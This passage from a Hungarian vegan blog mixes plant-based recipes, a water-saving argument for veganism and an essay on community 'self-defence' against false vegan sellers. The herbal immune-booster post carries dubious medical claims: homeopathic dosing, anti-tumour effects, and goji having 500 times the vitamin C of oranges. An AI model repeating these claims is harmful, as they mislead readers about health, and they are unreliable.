Szóval egy adag (kalóriába és tápértékben azonos mennyiségű) vegán étellel annyi vizet spórolhatunk egy adag marhahúsos ételhez képest, amivel 2-3 hónapon keresztül tudunk zuhanyozni! Persze egy vegán is átlag háromszor étkezik naponta, és aki vegyes táplálkozásúak is, így naponta annyi vizet spórol egy vegán az étkezéseken, mintha fél évig nem zuhanyozna valaki! A vegán életmóddal megspórolható édesvíz mennyiség óriási! Ehhez képest a fogmosáskor való vízhasználat, egy csepegő csap, vagy épp az ice bucket challenge-en 10-20 liter édesvíz/fő kiborogatása jelentéktelen. Mégis sokan próbálnak pár liter meg vizet spórolni az utóbbi,módokon, miközben az étkezésükkel ezer liter számra élik fel azt! Ezért a legjobb, amit édesvíz készleteink védelmében tehetünk, nem a háború, hanem az, ha vegán ételeket fogyasztunk.
Légy vegán! :)
J. K. Valentine
Kókuszos-gyümölcsös zabpehelytorta
A napokban az esős, viharos idővel - úgy tűnik - véget értek a napfényben pompázó hosszabb időszakok - legalább is egyelőre. Nagy bánatomra, ezzel együtt, a friss gyümölcsök és zöldségek is kezdenek megfogyatkozni. Szerencsére azonban nem kell édes és finom íz nélkül maradnunk. A következő tortával megszínesíthetjük a most következő hosszú hétvégénket is akár . Nagy előnye, hogy nem kell sütni, hűtőben kell némi ideig tárolni és már fogyasztható is! :) (Mivel több főre készült a torta egy születésnapra, így legalább dupla adaggal dolgoztam.)
A recept:
Hozzávalók:
- 1 adag zabpehely (pl. 30 dkg)
- víz
- narancs
- szőlőszemek
- növényi tej
- víz
- édes ízhez ragaszkodva: egészséges édesítőszer (banán vagy méz vagy gyümölcscukor, xilit és társai közül valamelyik, vagy aszalt datolya)
- útifű maghéj
- karob- vagy kakaópor
- 20 dkg kókuszreszelék
Elkészítés:
Ha apró szemű zabpelyhünk van, akkor a lábosban, amiben főzni fogjuk, kicsit megpirítjuk. Épp, amíg illata lesz a pirítástól. Majd felöntjük vízzel vagy növényi tejjel. Figyelve és olykor megkeverve addig főzzük, míg a zabpehely megpuhul. Jó sűrűre főzzük, kevésbé folyósra. Főzés legvégén adunk hozzá karobot vagy kakaóport, majd édesítjük, és adunk még hozzá 1 evőkanál útifű maghéjat.
(Ha nagy szemű zabpehellyel dolgozunk, akkor ugyanígy megpiríthatjuk, de egy éjszakára akár be is áztathatjuk hideg vízbe. Másnap pedig felfőzzük. Az ilyen zabpelyhek több főzési időt igényelnek.)
Amikor elkészült a sűrű, kakaós vagy karobos zabkása, egy kerek tálat frissen-tartó fóliával kibélelünk, a zabkása egyik felét vagy harmadát belesimítjuk.
Míg a zabkása fő, elkészítjük hozzá a kókuszhabot a következők szerint: A kókuszreszelékeket felöntjük annyi vízzel, hogy épp ellepje. Kicsit átforgatjuk kanállal. Mikor ázott egy rövid időt, a turmixgépbe tesszük. Attól függően, hogy banánnal vagy mézzel vagy datolyával (előre meleg vízben érdemes áztatni kb. 10 percet) édesítjük, azt is teszünk hozzá. Majd összeturmixoljuk. (Ezt nehezebben viszi valamivel a turmixgép.) Amikor láthatóan összeturmixolódott, ehhez is keverünk kb. 2 evőkanálnyi útifű maghéjat. Zselés, habos állagot ad neki egy idő után.
A már egy rétegnyi zabkására kókuszhabot simítunk, majd a zabkása-kókuszhab "szintezést" addig folytatjuk, míg van zabkásánk és kókuszhabunk. A frissen-tartó fóliával felülről is betakarjuk. Pihentetjük hűtőben néhány órát, majd a kerek formából kifordítva már csak a kész zabkása-tortát kell díszítenünk.
Alaposan megmosott narancshéjat reszeltem, az oldalát ezzel szórtam meg, a tetejét pedig narancs és szőlő párossal díszítettem.
Töltött alma
Egyszerűen elkészíthető, mindenki által kedvelt édesség, ami még csak nem is óriási kalóriabomba. Hozzávalók: Ovo változat: 8 db nagyobb, kemény húsú alma 2 tojásfehérje 20 dkg darált dió / mandula / mogyoró 10 dkg gyümölcscukor / nyírfacukor / eritrit 1 tk kókuszzsír vaníliapor Az almákat megmossuk, a magházat éles késsel (vagy almamagozóval) eltávolítjuk. Lehet kicsit nagyobb lyukat vájni, mert akkor több töltelék fér bele. Ha az almát szeretjük jobban, akkor maradhat kisebb a lyuk. :) Egy tepsit kizsírozunk, elhelyezzük benne az almákat. A diót ledaráljuk, és összekeverjük a cukorral és egy csipet vanília porral. A sütőt begyújtjuk. A tojásfehérjét felverjük, óvatos mozdulatokkal belekeverjük a cukros-diós keveréket. Gyorsan megtöltjük vele az almákat. Forró sütőbe tesszük, és alacsony hőfokon, lassú tűzön kb. 40 percig sütjük, míg az alma megpuhul, a töltelék teteje pedig meg nem pirul kicsit. Viszont tudok ennél egy egészségesebb, és nagyon finom, tojásmentes változatot is, amit érdemes kipróbálni. Vegán változat: 8 db nagyobb, kemény húsú alma 1/2 bögre köles 20 dkg darált dió 10 dkg gyümölcscukor / nyírfacukor / eritrit 1 tk kókuszzsír 1 csipet só vaníliapor A kölest bő 1,5 bögre vízzel, sóval, és cukorral (mindig sztíviával szoktam, ennyihez kb 10 csepp elég, persze ízlés szerint), illetve a vaníliával 20 perc alatt megfőzzük. Ezalatt az almákat kicsumázzuk, kizsírozott tepsibe helyezzük. A diót megdaráljuk, és hozzákeverjük a megfőtt köleshez. A keverékkel megtöltjük az almákat. A maradékot (ha van - ez attól függ, mekkorák az almák, és a lyukak :) ) gombócként az almák mellé halmozva megsüthetjük. Alacsony hőfokon, lassú tűzön kb. 40 percig sütjük, míg az alma megpuhul, a töltelék teteje pedig meg nem pirul kicsit.
Fűszeres Sütőtök Pite
Ilyenkor októberben mindenhol sárgán világítanak a sütőtökök. A piacon, a zöldségesnél, a kertben… A recept téma adja magát, mindig hangsúlyozom, hogy azokat a zöldségeket, gyümölcsöket fogyasszuk amelyeket a természet kínál nekünk az adott évszakban. A sütőtök nagyon sok B vitamint tartalmaz. Fogyasztása szebbé teszi a bőrünket és magas rosttartalma miatt jelentős béltisztító hatással bír. Alacsony kalória tartalma miatt fogyókúrázók is bátran fogyaszthatják. A sütökökből számtalan recept készíthető, édesség gyanánt az alább pitét ajánlom: Hozzávalók: Tészta: 20 dkg világos tönköly liszt 8 dkg nyírfacukor vagy nádcukor csipet só 1/2 zacskó foszfátmentes sütőpor 15 dkg bio margarin Töltelék: 50 dkg nyers, tisztított sütőtök 2-3 evőkanál méz vagy nyírfacukor, vagy nádcukor 1/2 kávéskanál őrölt fahéj késhegynyi őrölt szerecsendió késhegynyi őrölt kardamon 100 ml kókusztejszín 3 evőkanál kukorica keményítő A tészta hozzávalóit összegyúrjuk és 30 percet pihentetjük. A töltelékhez a sült tököt a kókusztejszínnel, a tetszőleges édessítővel, fűszerekkel, keményítővel, botmixer segítségével krémesre turmixoljuk. Pite formához kinyújtjuk a tésztát kb. 0,7 cm vastagságúra és egy 32 cm átmérőjű, kiolajozott pite formát kibélelülnk a tésztával és 5 percig 180 C fokon elősütjük. Majd beletöltjük a tölteléket és további 20 percig sütjük. Nagyon finom melegen, hidegen, önmagában vagy egy meleg, fűszeres teával.
Pirított brokkolikrémleves
Mitől lesz egy levesnek igazán jó íze? Nem, nem a leveskockától :) - én személy szerint menekülök a leveskockás vagy ételízesítős receptektől. Az ízesítést ennél egy jóval bonyolultabb dolognak tartom, ahol aromás növények, savanyító- és édesítőszerek, megpirult részek kiegyensúlyozott és egyedi harmóniáját kis só teszi teljessé. Akárcsak ebben a finom levesben. :)
Hozzávalók 2-3 adaghoz:
- 450 g brokkoli
- 1 vöröshagyma
- 1/2 dl olaj
- 1 gerezd fokhagyma
- 15 g szezámmag
- 1 evőkanál szárított zöldségmix
- 1 kávéskanál almaecet
- 1 l víz
- tökmag a díszítéshez
- Az olajon pirítsuk meg a felaprított vöröshagymát, majd dobjuk rá a fokhagymát és az összevágott brokkolit is.
- Fűszerezzük jól meg, adjuk hozzá a szezámmagot, és rendszeres kevergetés mellett pirítsuk saját levében, amíg meg nem puhul minden.
- Öntsük fel vízzel és botmixerrel pürésítsük.
- Jól keverjük benne el az ecetet, és tökmaggal tálaljuk.
Jó étvágyat! Elkészítési idő: 20 perc
Egy kattintás, és nem maradsz le a további receptekről:
Töltsd le ITT két ajándék receptfüzetünket a Hírlevél feliratkozás mellé!
Kendermag tej - recept
2014. október 19. Vegan Spirit
A kendermagról már bővebben írtam itt. Most egy egyszerű gyors, és finom receptet osztok meg veled. A kendermag tej receptjét. Az árát tekintve, még a bio kendermagból készült tej literenkénti ára is kijön 350ft-ból. Nem bio kendermag esetén pedig kb 150ft körül van.
Rendzseresen elkészítem magamnak ezt a remek, tápláló italt, mert ez az egyik kedvenc növényi tejem. Mondjuk fel kell készülnöd, mert a kendermagnak vagy egy erős, karakteres íze, amit nem tudok semmi máshoz hasonlítani. Számomra kicsit olyan, mintha poros széna ízét érezném. Na de éppen erre találták ki az ízesítést, úgyhogy íme a recept:
1 liter tejhez
- turmixgép, vagy botmixer.
- szűréshez zokni, harisnya, vagy gézlap.
- 100-150g nyers kendermag 6-8 órára beáztatva (lehetőleg bio)
- 1 liter tisztított víz
- egy csipet só
- 5-10 szem aszalatlan datolya édesítéshez (ízlés szerint)
- 1 banán (elhagyható)
A kendermagot, mint minden magot, fogyasztás előtt fontos áztatni, ugyanis azok az enzimgátlók, melyek tetszhalott állapotban tartják a magokat, csak így távolíthatóak el. Ha nem áztatjuk be az elfogyasztásra szánt magot, akor az enzimgátlók a mi szervezetünkön belül is végzik majd a dolgukat, így az értékes tápanyagok és enzimek nagyrésze kárba vész!
Az, hogy mennyi magot használunk a tej elkészítéséhez, egyéni ízlés kérdése. Én jobban szeretem a sűrűbb növényi tejeket, ezért 150 grammot szoktam használni. Áztatás után átmosom a kendermagot, majd a turmixgépbe rakom. Felöntöm annyi vízzel, hogy ellepje, majd kb 40-60 másodpercig turmixolom. Ha gyengébb turmixgépünk, vagy botmixerünk van, akkor inkább 2 percig forgassuk, biztos ami biztos. Ezután felöntöm a maradék vízzel, és újabb 1 percig turmixolom. Mikor kész, leszűröm. Én erre a célra vett, fehér pamut zoknit használok, mert jól ki lehet csavarni. Közben elöblítem a turmixkelyhet. Ha leszűrtük, jöhet az ízesítés. A datolyát és a banánt belerakom a turmixgépbe, és felöntöm annyi tejjel, hogy ellepje, majd jól elturmixolom. Végül felöntöm a maradjék tejjel, és 10-15 másodpercig még turmixolom. Én általában kétszerre megiszom az egy litert, de csak heti gyakorisággal készítem el. Ha nem bírsz ennyit meginni egy nap alatt, akkor készíts kissebb adagot. Tárold hűtőben, és 24 órán belül fogyaszd el.
Kakaónak is isteni, érdemes kipróbálni!
Elkészítheted ZöldElla receptjét is, aki szintén valamelyest az én propagandám hatására készítette el, és írta meg korábban a blogjára.
Fogyasztását ajánlom nagy fizikai igénybevétel, esetére, izomtömeg növekedés eléréséhez. Ha étkezés helyett fogyasztunk egy pohárral, akkor fogyáshoz is ideális segítséget nyújt. Ezen felül különösen ajánlom a fehérje mítosz hívőknek, napi többszöri fogyasztását.
Fogyaszd boldogsággal földanyánk eme tápláló anyatejét. :)
J. K. Valentine
Kókuszkrémes kölestorta
Amikor már nem bírtam tovább a golyócskák készítését, (5 óra ételkészítés után :D ), akkor úgy döntöttem, hogy a maradék hozzávalókból torta lesz. Annyit módosítottam, hogy a kókuszkrémhez kevertem egy kis kakaóport. Tehát a receptet itt találjátok : http://eletkert.wordpress.com/2014/10/18/toltott-kolesgolyok/ Csodás kosárkákat a kosárfonó csapatnak ;) Így nézett ki felvágva ;) Kategória:édességek, Nyers és főtt is […]
Vegán önvédelem?
2014. október 17. Vegan Spirit
Az elmúlt napokban történt pár dolog, a facebook legnagyobb hazai vegán csoportjában, a Vegan in Hungary-ben, ami arra sarkallt, hogy leírjam a gondolataimat a veganizmus-erőszak-erőszakmentesség édes hármasáról, melybe oly gyakran gabalyodom bele én magam is. Jelen posztommal nem kívánok pálcát törni az események egyik érintettje felett sem, jóllehet az én profilom is letiltásra került. Arra viszont tökéletes példát nyújt a jelen helyzet, hogy kifejtsem a véleményem a fent említett 3 fogalom bonyolult kapcsolatáról, de kezdjük az elején...
...Történ ugyanis, hogy az egyik csoporttag egy megdöbbentő posztot tolt fel a Vegan in Hungary-be, miszerint az egyik, magát nevében is vegánnak nevező életmód tanácsadó, olyan kijelentéseket tett, melyek megkérdőjelezik hitelességét. A szóbanforgó személy szerint viszont nem történt ilyen kijelentés.
Nos, mivel a célom nem a konkrét eset igazságának felkutatása, ezért nem megyek bele a részletekbe, csak elméleti síkon folytatnám a boncolgatást.
Ha azt látod, hogy az oroszlán harapja a bivalyt, tudhatod, hogy a bivaly nem védekezik, és hamarosan elpusztul. Ha azt látod, hogy a bivaly felöklelte az oroszlánt, tudhatod, hogy a bivaly védekezik, de mindkét esetben az oroszlán a támadó és a bivaly az áldozat. Még ha az oroszlán meg is sérül, és ha megsajnálod is miatta, akkor is ő támadta meg a bivalyt, a bivaly csak védekezett!
Amiről beszélni szeretnék az az, hogy hogyan/mit tegyünk, ha valaki történetesen vegánként hirdeti magát és szolgáltatásait, de kiderül róla, hogy mondjuk a veganizmusnak csak egy részét tartja fontosnak, vagy, hogy egyáltalán nem a veganizmus elvei alapján éli az életét?
Először is, ha van időnk, olvassuk el a veganizmus rövid történetét, hogy megértsük a veganizmus célját. Ha nincs időnk, akkor itt a lényeg:
" A Vegán Társaság célja az, hogy véget vessen az állatok emberi kizsákmányolásának. A veganizmus, ennek megfelelően, azt az alapelvet jelenti, hogy az embernek az állatok kizsákmányolása nélkül kellene élnie.
A Társaság ezennel elkötelezi magát a kitűzött cél teljesítésére, vagyis arra, hogy megszüntesse az állathasználatot; ideértve az állatok élelmezési célú használatát, az állatok dolgoztatását, a vadászatot, az állatokon való kísérletezést, illetve az állati életet kizsákmányoló minden más emberi tevékenységet."
Másodszor meg kell értenünk a veganizmus elvei mentén használható eszközöket. Ez nem olyan nehéz, legalábis első ránézésre. Kövekeztetni tudunk egyrészt abból az elvből, hogy minden állattal szembeni erőszak, elnyomás és kihasználás eltörlését tűzi ki célul a veganizmus. Másrészt abból a megfogalmazásból, hogy az embert is az állatvilág részeként említi/kezeli, tehát az erőszak, elnyomás és kihasználás megszüntetésének célja az emberi társadalomra is érvényes, ám nem kiemelt a több tízmilliárd, évente lemészárolt állathoz képest. Már csak azért sem, mert az emberi társadalomban lévő elnyomás és erőszak nagyrészt megszüntethető volna pusztán azáltal, hogy felhagyunk a nálunk gyengébbek, és a nekünk kiszolgáltatottak kizsákmányolásával. Illetve az emberek közötti erőszak és elnyomás felszámolását már számtalan mozgalom a kezébe vette, mint az abolicionisták, a feministák, Mahatma Gandhi, Martin Luhter King, Nelson Mandela vagy Rosa Sparks.
Tehát kijelenthetjük, hogy a veganizmus, céljai eléréséhez, csak olyan eszközöket használhat fel, melyek a mozgalom elveivel megegyeznek, vagyis nem szülnek elnyomást, erőszakot, nem épülnek kizsákmányolásra, és nem teszik lehetővé mások kihasználását!
Mit is tehetünk hát, ha van egy csaló, aki vegán színekben tetszeleg. de nem felel meg a vegán elveknek?
Nem alkalmazhatunk erőszakot? Ez a szó hétköznapi értelmében igaz, azonban az önvédelem joga megillet minket is! Az önvédelem pedig nagyon ritkán valósítható meg kéréssel, kedves szavakkal, mosolygással, vagy öleléssel. Éppen úgy, ahogy az utcán megvédeném magam, vagy a mást, ha rá támadna valaki, vagy ahogy a szervezetem immunrendszere védi a testemet, ugyan úgy a vegán közösségnek is meg van a joga az önvédelemre, ha támadás éri. Mint minden közösségnek, kell hogy legyen egy védekező mechanizmusa, ami kiszűri és hatástalanítja a közösséget veszélyeztető dolgokat. Egy olyan világban, ahol évente 55 milliárd ártatlant végeznek ki, azt gondolni, hogy nincs szükség önvédelemre, elképesztő naívság. Az önvédelem nem lehetőség, nem választható opció, hanem felelősségteljes kötelesség! Hiszen mi lenne, ha mindenféle csaló és hazug ember, a veganizmus látszata mögé bújva akarna meggazdagodni, és mi ezt hagynánk?
Ebben az esetben mi sértenénk meg leginkább az elveinket!
1. Mert ebben az esetben a megtévesztett emberek tömege válna kihasználás áldozatává!
2. Ugyanúgy a veganizmus is a kihasználás áldozatául esne, hiszen hasznot húznának belőle!
3. A vegán mozgalom egy ilyen helyzetben nem csak kihasználás áldozata lenne, de amint fény derülne a csalók űzelmeire, úgy a mozgalom is elhalna az emberek bizalmával párhuzamosan. Gyakorlatilag a hitelesség jelenti a mozgalom életét!
Éppen ezért a legfontosabb, hogy a mozgalom hitelességét megőrizzük, és ehhez az önvédelem elegendő ezközt biztosít. Ha valaki állattenyésztő, húsevő, vagy állati termékeket használ, de közben vegánként hirdeti magát, és mindezt ráadásul pénzért teszi, az teljesen hiteltelen, és az ilyen személyt a közösségnek kötelessége megkérni, hogy fejezze be tevékenységét, vagy amennyiben tevékenységét nem hajlandó abbahagyni, úgy nevéből hagyja el a vegán jelzőt!
Az ilyen személy nem nevezhető vegánnak, hiszen nem felel meg a világosan megfogalmazott elveknek! Innentől fogva kötelességünk kimondani az ilyen szeméyről, hogy nem vegán! Az igazság kimondása pedig sohasem erőszak, bár nyilvánvalóan nagyon kellemetlen lehet annak, akire vonatkozik.
Ha valaki nem érti meg, miért próbál tőle elhatárolódni a közösség, és a magyarázatokat támadásként kezeli, az nem változtat a csalás tényén, és a hitelességünk megőrzésének szükségességén. Mivel egy ilyen csaló személy önmaga tetteinek következményével kerül szembe, nem pedig a vegán mozgalom által ráerőltetett helyzettel, ezért minden a helyzettel járó kellemetlenség önmagától származik. Ezekért a kellemetlenségekért a vegán mozgalmat erőszakosnak, kirekesztőnek beálítani olyan, mint rosszindulattal vádolni a rendőrt, aki elfog egy tolvajt.
A támadás és védekezés között a különbség az, hogy mindig a támadó teszi meg az első lépést, és akit megtámadtak, visszatámadni ugyan tud, de az már önvédelem! Ne felejtsük tehát el, hogy aki hamisan vegánnak állítja be magát, és ezzel a vegán mozgalom hitelességét és létezését veszélyezteti, az bizony már megtete az első lépést, és a mozgalomnak csak a védekezés marad, amit meg is kell tennie, ha nem akar egy hitelét vesztett, nevetséges tévútként bekerülni a történekemkönyvekbe!
Végül azt is fel kell ismernünk, hogy amint a támadást megvalósító tény megszűnik, úgy a további önvédelem feleslegessé válik, ezért ilyenkor meg kell köszönni a támadónak a viszavonulást, és fel kell hagyni a további önvédelemmel!
Frissítés: Természetesen meg kell említsük, hogy az önvédelemnek tárgyilagosnak kell lennie. Nem csaphat át személyeskedésbe, vagy nem térhet el más módon a tárgytól, mert az már kilép az önvédelem határain túlra! Minden vegán érvelésnek olyannak kell lenni, amit Pl Mahatma Gandhi-tól láthattunk. Tisztán és érthetően meg kell fogalmazni a problémát és a megoldást, mindezt úgy, hogy ne akarjuk sértegetni, bántani az érintetteket. Éppen úgy, ahogy nem személyeskedhetünk senkivel, mert az az értelmi kommunikáció végét jelenti. Nem szabad a személyek felett pálcát törni, ha a tetteik azok, amik nem megfelelőek. Nem ítélhetjük el a másként táplálkozókat, ahogy ugyanezt joggal várjuk el mi is a többségtől. Viszont elmondhatjuk mondjuk hogy a húsevés, a hozzá kapcsolódó halálipar miatt sem emberhez, sem álathoz nem méltó. Megkérhetjük őket, hogy hagyjanak fel ezzel a szokással, és érvelhetünk a húsfogyasztás hatásaival. Példálózhatunk a veganizmus hatásaival is, de nem mondhatjuk, hogy "Már a fejeden látszik, hogy értelmileg egy szinten vagy egy kanna benzinnel" vagy hogy "nem tudom mit vártam egy ilyen zsíros hajú, púpos hátú agymosott zombitól!"
Ez már nem érvelés, nem kérés, és nem önvédelem. Ez pusztán megalázás, ami elveiben szintén nem vegán, ezért miden ilyen kinyilatkozástól tartózkodni kell!
Természetesen nagyon sokat segítene egy ilyen kérdéses szituációban egy egységes és hivatalosan bejegyzett Magyar Vegán Társaság, mely alkalomadtán hivatalosan is felkérhetné a problémás esetek érnitetjeit, a helyzet megoldására, vagy végső esetben megvonhatná a vegán jelzőt, esetleg jogi úton is feléphetne a visszaélőkkel, lejáratókkal szemben.
Öszegezve a fenti eszmefuttatást, véleményem szerint, ha valaki vegánként pozícionálja és adja el magát, és szolgáltatásait, miközben nem vegán, akkor meg kell kérni, hogy váljon vegánná, vagy fejezze be tevékenységét, vagy amennyiben tevékenységét nem hajlandó abbahagyni, úgy nevéből hagyja el a vegán jelzőt!
J. K. Valentine
Körte csatni
2014. október 13. Lét-tudatos konyha
Hozzávalók: - 50 dkg körte - 3 evőkanál nádcukor - 1 teáskanál őrölt fahéj - 1kávéskanál őrölt szegfűszeg - 1/2 kávéskanál chilipor - 2 evőkanál olívaolaj Elkészítése: A körtét megtisztítjuk és apró darabokra vágjuk. A fahéjat és a szegfűszeget az olajon megpirítjuk. Hozzáadjuk a gyümölcsöt és a cukrot. Fedő alatt puhulni hagyjuk, levet fog ereszteni. Kb. 10 perc múlva hozzáadjuk a chilit és összepároljuk. Édes-csípős mártás állagú. Főételek mellé kiegészítésként fogyasztjuk.
5+1 kevésbé ismert immunerősítő gyógynövény
2014. október 10. Éltető ételek
Az előző részben az 5+1 legismertebb gyógynövényt mutattam be, most folytatom a sort a kevésbé ismert, de annál hatékonyabb gyógynövényekkel. 1. Echinacea (Bíbor kasvirág) Hazánkban termesztett dísznövény. Elsősorban alkoholos kivonata ismert, de teaként is fogyasztható. Számos immunerősítő tabletta fő hatóanyaga. Homeopátiás készítményként is megvásárolható, amelyet mindenképp kúraszerűen kell alkalmazni! D6-os potenciálban napi 2x5 globulus bevétele szükséges. Hagyjuk, hogy a száj nyálkahártyáján szívódjon fel. 1 hét szedés után 1 hét szünet szükséges. Aktiválja a makrofágokat, és fokozza az interferon képződést. Ezáltal nagyon hatékony immunstimuláns, sejtosztódást gátló, antivirális és antibakteriális. 2. Gyömbér A hagyományos indiai ájurvédikus orvoslás szerint a gyömbér nemcsak a testet, hanem a lelket is erősíti. Elsősorban étvágyjavító, emésztésserkentő hatásáról ismert, de téli betegségek megelőzésére is kiváló. Erősíti az immunrendszert , a megfázást kísérő hörghurut és az influenzával járó izom- és mellkasfájdalom enyhítésében is segít. 3. Ginzeng (élet gyökere) Ázsiában nagyra értékelt roborálószer, azt tartották róla, hogy visszahozza a fiatalságot. Az idős, legyengült szervezetet erősíti, növeli a fehérvérsejtek számát és aktivitását . Ezáltal immunerősítő, tumorellenes . Kedvezően hat a nemi szervek működésére, nemhiába került az Active GTC-be is. Hat a vörösvértestek képzésére is, növeli az oxigénszállítást, vérkeringés javító, véralvadásgátló . Jótékony hatású a központi idegrendszerre, élénkítő, fokozza a koncentráló készséget . Összességében a szellemi és fizikális erőnlét fenntartásához járul hozzá. 4. Orvosi ziliz (Fehér mályva) Ez már valóban egy kevésbé ismert gyógynövény, pedig akár az allergiások megmentője is lehetne. Elsősorban a gyökerét használjuk drogként, de a levele is gyűjthető. Magas nyálkatartalma van, ezenkívül flavonoidokat, keményítőt, aszparagint, ásványi anyagokat is tartalmaz. Mivel fokozza a leukociták falóképességét, így immunstimuláns hatású . Ezenkívül a nyálkatartalma miatt nagyon jól használható emésztőszervi gyulladások esetén, asztmára, szénanáthára, köhögésre is. Nemcsak belsőleg, hanem külsőleg - orrba cseppentve, arcot, szemet megmosva is bevethetik az allegiások. A hideg áztatással készült ziliztea beivódik a nyálkahártyába, a bőrbe, megszüntetve ezáltal a szem-, orr- és fülviszketést. 5. Goji berry Erről a bogyóról elmondható, hogy szinte mindenre jó. Immunmoduláló hatása révén fokozódik a fehérvérsejtek aktivitása . Az egyedülálló L.B. Poliszacharidok, amik megtalálhatóak benne, szívvédő, rákmegelőző és immunstimuláló tulajdonságokkal rendelkeznek. Az antioxidáns karotinoidok egész tárházát tartalmazza, beleértve a béta-karotin t (és jobb forrása annak, mint a sárgarépa!) és a zeaxantin t is, ami a szemet védi. C-vitamin tartalma 500x magasabb súlyarányosan a narancsnál. Az aszalt goji számos nyers étel alapanyaga lehet, juice formában ütős immunerősítő. 5+1 Körömvirág Ezt a csodás gyógynövényt biztosan sokan ismerik, de immunerősítő hatása kevésbé ismert . Bőven tartalmaz flavonoidokat, xantofillt és karotinoidot, szaponint, E-vitamint, keserűanyagot. A virágából készült teája és alkoholos kivonata amellett, hogy immunstimuláns és antioxidáns, felhasználható bélrendszeri gyulladások kezelése során is. Antibakteriális, antivirális, erősíti a nyirokrendszert, keserűanyag tartalma jótékony hatással van a májra és az epére. A virágából macerátummal készült olaja és a kenőcs is kiváló gyulladáscsökkentők és sebgyógyítók. Ne féljünk használni a gyógynövényekben rejlő erőt, alkalmazzuk bátran megelőzésre és gyógyulásra is.
Palacsinta kicsit másként: túrós kakaós zabpalacsinta
Ki ne szeretné a palacsintát? Főleg a túrósat? Én is egy rajongó vagyok, ha arról van szó, hogy enni kell. Amióta azonban megkóstoltam ezt az egészségesebb verziót, csakis ezt készítem, ha túrós palacsintára fáj a fogunk. Ez a palacsinta Isteni finom! :-) A hagyományos palacsinta is idő igényes, és ez ezzel a reform palcsintával sincs másként. Viszont sokkal kevesebb mennyiséggel is jól lehet lakni, látványos (színeiben hasonlít a túrórudihoz), nem szennyezzük a testünket vele, úgy, mint a hagyományos palacsintákkal, könnyebben emészthető a magas rosttartalmának köszönhetően (zab), és irtó finom! ;-) túrós kakaós zabpalacsinta A zab, az egyik leghasznosabb tápanyagtartalommal bír a gabonák közül, megfizethető áron van, és lassú felszvódása miatt a zabból készült ételek sokkal hosszabb ideig okoznak jóllakottság érzést, mint az egyéb gabonák pl.: búza. Magyarországon nem éppen elterjedt gabona fajta manapság, de nem volt ez mindíg így. A régebbi korokban előszeretettel fogyasztották pl.: a zabkását, amit a szegények ételének tartottak. Olcsó volt, rengeteg energiát adott, és sokáig laktató, így jól bírták az egész napos fizikai munkát is vele a földeken, vagy akár a harc téren. A zab magas fehérjetartalommal, gyomorbarát gyulladásgátló anyagokkal, magas B és E vitaminnal bír. Gazdag vas, kálium, kálcium, magnézium és foszfor forrás. Rendszeres fogyasztása igen jó hatással van az egészségünk megőrzésére, mivel javíthatja az emésztést, a csontok illetve az erek általános állapotát. Itt Írországban, és talán már más országban is újra előtérbe kerül ez az értékes gabona, és újra egyre többen fogyasztják jótékony hatásai miatt. Mi is köztük vagyunk! :-) Hozzávalók: (kb.2 főnek) A tésztához: - 150 g teljes kiőrlésű, nagy szemű zabpehely - 1 dl növényi tej (mandula, vagy mogyoró, vagy kókusz) - 3,5 dl víz - 20 g keserű, sovány kakaópor, vagy karob por - 2 ek Agave szirup (vagy Xilit, vagy Demerara cukor) - csipet Himalája só - késhegynyi szódabikarbóna A túrókrémhez: - 250 g sovány túró - 1/2 citrom leve - 1/2 citrom reszelt héja (lehetőleg vegyszermentes) - tetszőleges édesítőszer ízlés szerinti mennyisége - vanília kikapart magja (vagy Vanília extract, kivonat) - 1/2 dl növényi tej (mandula, vagy mogyoró, vagy kókusz) Elkészítés: A tészta hozzávalóit keverjük össze, majd hagyjuk állni, hogy a zabpehely kellően átázhasson. Ez minimum 30 perc, de ha úgy tetszik, egy éjszakára is beáztathatjuk (ez esetben tegyük hűtőbe). Mindezek után kézi mixerrel vagy turmixgéppel pépesítjük. Felforrósított teflon serpenyőben sütjük. A sikeres sütés titka, hogy egy kissé előcsalogassuk magunkból a tűzhely DJ-t, és bőszen csavargassuk a gombokat. A serpenyő legyen tűzforró, amikor beleöntjük a tésztát, és szétterítjük. Azonban a zabpalacsinta nem szeret nagy lángon sülni, így amikor folyamatban van a sütés, vegyük alacsonyabbra a hőfokot. Az egyik oldalának 3-4-szer annyi idő kell, mint a másiknak megfordítás után. (Vigyázat, amíg nem sül meg az egyik oldala, nehezen forgatható, könnyen törik,ha ezt észleljük, legyünk türelemmel, várjunk még egy keveset!) Végül tányérra csúsztatjuk. (Ha hibátlan a teflonbevonat a serpenyőn, nem szükséges zsiradékot használni, Ha mégis, akkor használj kókuszzsírt!) A túrókrém elkészítéséhez a hozzávalókat keverjük össze, és hűtsük le. És ezzel a krém el is készült. :-) (Én kézi botmixerrel ezt is krémes állagúvá varázsoltam.) Az elkészült és kihűlt palacsintákat többféle formában tálalhatjuk. Az eredeti recept szerint kenjük meg a krémmel a palacsintákat, és göngyöljük fel a hagyományos módon. Így lesz belőle túrórudi palacsinta. ( http://fittipaldii.blogspot.ie/2013/10/turo-rudi-zabpalacsinta.html) Túrórudi zabpalacsinta a kép erről a webhelyről származik: http://fittipaldii.blogspot.ie/2013/10/turo-rudi-zabpalacsinta.htmlÉn inkább palacsinta tortát készítettem belőle, és egymásra pakoltam a palacsintákat, köztük a krémmel. túrós kakaós zabpalacsinta torta Előfordult, hogy egy karácsonyi vacsora alkalmával mutatós kis tornyokat építettem belőlük. Na ez tényleg nagyon időigényes, de jól néz ki! :-) Virág formájú linzer szaggatókkal kiszaggattam a készre sült palacsintát. Nagy virág alulra, és egyre kisebb virág rá, majd még kisebb a tetejére. Közé pedig mehet a túrós krém. Karácsonykor egy kicsit a havas fenyőfákra emlékeztetnek a formák...talán... Bár jó képzelő erő kell hozzá! :-D túrós kakaós zabpalacsinta téli hangulató formában Megjegyzés1: Ha kedvünk úgy tartja, vonjuk be étcsokoládé-krémmel. 10 g zsírszegény kakaópor / karob por, pár ek. víz (mondjuk 5-6), tetszőleges édesítőszer, 1 teáskanál kókuszzsír. A fenti összetevők alacsony lángon összeforralandók, sűrűsödésig. Langyosan a palacsintákra kenjük. Dermedésig tartsuk hűtőben. Megjegyzés2: Az eredeti recept Fittipaldi gasztro blogger oldalról származik. Megjegyzés3: Ha valaki nagy kókusz rajongó, érdemes lenne kipróbálni kókuszreszelékkel a krémet, és a tejek helyett is konzerves kókusz tejet tenni bele.
Vitamingolyók
